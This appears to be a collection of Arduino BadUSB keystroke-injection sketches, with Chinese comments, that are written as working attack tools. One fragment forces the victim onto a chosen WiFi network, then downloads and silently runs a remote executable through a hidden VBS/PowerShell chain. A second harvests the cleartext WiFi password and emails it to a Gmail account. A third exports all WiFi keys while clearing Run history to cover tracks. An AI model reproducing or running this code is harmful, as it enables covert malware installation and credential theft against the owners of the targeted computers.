  Keyboard.println("echo ^<WLANProfile xmlns=\"http://www.microsoft.com/networking/WLAN/profile/v1\"^> >> %TEMP%\\pl.xml ");  //强迫连接WIFI热点，并下载psl木马
  Keyboard.println("echo ^<name^>INPUT0^</name^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^<SSIDConfig^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^<SSID^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^<hex^>INPUT1^</hex^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^<name^>INPUT0^</name^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^</SSID^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^</SSIDConfig^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^<connectionType^>ESS^</connectionType^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^<connectionMode^>auto^</connectionMode^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^<MSM^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^<security^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^<authEncryption^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^<authentication^>WPA2PSK^</authentication^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^<encryption^>AES^</encryption^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^<useOneX^>false^</useOneX^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^</authEncryption^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^<sharedKey^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^<keyType^>passPhrase^</keyType^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^<protected^>false^</protected^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^<keyMaterial^>INPUT2^</keyMaterial^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^</sharedKey^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^</security^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^</MSM^> >> %TEMP%\\pl.xml ");
  Keyboard.println("echo ^</WLANProfile^> >> %TEMP%\\pl.xml ");
  Keyboard.println("netsh wlan add profile filename=%TEMP%\\pl.xml ");
  delay(2000);
  Keyboard.println("netsh wlan connect name=INPUT0 ");
  delay(3000);
  Keyboard.println("echo $wc = New-Object System.Net.WebClient > %temp%\\dl.ps1");
  Keyboard.println("echo $url = \"INPUT3\" >> %temp%\\dl.ps1");
  Keyboard.println("echo [string]$hex = $wc.DownloadString($url) >> %temp%\\dl.ps1");
  Keyboard.println("echo [Byte[]] $temp = $hex -split ' ' >> %temp%\\dl.ps1");
  Keyboard.println("echo [System.IO.File]::WriteAllBytes(\"%TEMP%\\svcfw.exe\", $temp) >> %temp%\\dl.ps1");
  Keyboard.println("echo start-process -nonewwindow \"%TEMP%\\svcfw.exe\" >> %temp%\\dl.ps1");
   
  delay(2000);
  
  Keyboard.println("echo Set oShell = CreateObject(\"WScript.Shell\") > %temp%\\dl.vbs");
  Keyboard.println("echo oShell.Run(\"powershell.exe -ep bypass -nologo -c %temp%\\dl.ps1\"),0,true >> %temp%\\dl.vbs");
  delay(1000);
  Keyboard.println("wscript %temp%\\dl.vbs");
  delay(3000);
  
  Keyboard.println("exit");

  

}

void loop(){
}

DEFS






================================================
FILE: WiFi_PasswordAcquisition/WiFiPasswordCapture(tool).ino
================================================
/ /无线密码捕获工具
//说明:将SSID、网络类型、鉴权、密码保存到Log.txt中，将Log.txt的内容通过email发送到gmail账户。
void setup() {
  Keyboard.begin();
  delay(3000);
//Minimize all windows and open run cmd
  Keyboard.press(KEY_LEFT_GUI);
  delay(200); 
  Keyboard.press('d');
  delay(200); 
  Keyboard.release('d');
  delay(200); 
  Keyboard.print("r");
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(200); 
  //=========================cmd==========================
  Keyboard.println("cmd");
  delay(1000);
  //获取SSID信息
  Keyboard.println("CD \"%userprofile%\\dEsktop\" & FOR /F \"TOKENS=2 DELIMS=: \" %A in ('NETSH WLAN SHOW INTERFACE ^| FINDSTR \"SSID\" ^| FINDSTR /V \"bssid\"') DO SET a=%a");
  //搜寻关键字符串，创建TXT文件
  Keyboard.println("NETSH WLAH SHOW PROFILES %a% KEY=CLEAR | FINDSTR /C:\"nETWORK TYPE\" /C:\"aUTHENTICATION\" /C:\"kEY cONTENT\" | FINDSTR /V \"BROADCAST\" | FINDSTR /V \"rADIO\">>a.TXT");
  //获取网络类型
  Keyboard.println("FOR /F \"TOKENS=3 DELIMS=: \" %a IN ('FINDSTR \"nETWORK TYPE\" a.TXT') DO SET b=%a");
  //获得认证
  Keyboard.println("FOR /F \"TOKENS=2 DELIMS=: \" %a IN ('FINDSTR \"aUTHENTICATION\" a.TXT') DO SET c=%a");
  //获得密码
  Keyboard.println("FOR /F \"TOKENS=3 DELIMS=: \" %a IN ('FINDSTR \"kEY cONTENT\" a.TXT') DO SET d=%a");
  //删除TXT文件
  Keyboard.println("DEL a.TXT");
  //创建文件Log.txt
  Keyboard.println("ECHO ssid: %a%>>lOG.TXT & ECHO nETWORK TYPE: %b%>>lOG.TXT & ECHO aUTHENTICATION: %c%>>lOG.TXT & ECHO pASSWORD: %d%>>lOG.TXT");
  //邮件发送Log.txt
  Keyboard.println("POWERSHELL");
  Keyboard.println("$smtpiNFO = nEW-oBJECT nET.mAIL.sMTPcLIENT('SMTP.GMAIL.COM', 587)");//国内推荐使用163，qq邮箱
  Keyboard.println("$smtpiNFO.eNABLEsSL = $TRUE");
  Keyboard.println("$smtpiNFO.cREDENTIALS = nEW-oBJECT sYSTEM.nET.nETWORKcREDENTIAL('account@GMAIL.COM', 'password')");//邮箱账号、密码
  Keyboard.println("$rEPORTeMAIL = nEW-oBJECT sYSTEM.nET.mAIL.mAILmESSAGE");
  Keyboard.println("$rEPORTeMAIL.fROM = 'account@GMAIL.COM'");
  Keyboard.println("$rEPORTeMAIL.tO.aDD('receiver@GMAIL.COM')");
  Keyboard.println("$rEPORTeMAIL.sUBJECT = 'wIfI KET GRABBER'");
  Keyboard.println("$rEPORTeMAIL.bODY = (gET-cONTENT lOG.TXT | OUT-sTRING)");
  Keyboard.println("$smtpiNFO.sEND($rEPORTeMAIL)");
  Keyboard.println("EXIT");
  Keyboard.println("DEL lOG.TXT & EXIT")//清除log.txt文件并退出
  //======================================================
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}

void loop() {
}


================================================
FILE: WiFi_PasswordAcquisition/WiFiPasswordExport(tool).ino
================================================
void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500); 
  Keyboard.println("CMD /C START /MIN REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&CMD /C START /MIN NETSH WLAN EXPORT PROFILE KEY=CLEAR FOLDER=C:\\");  //WIFI密码导出到指定位置
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}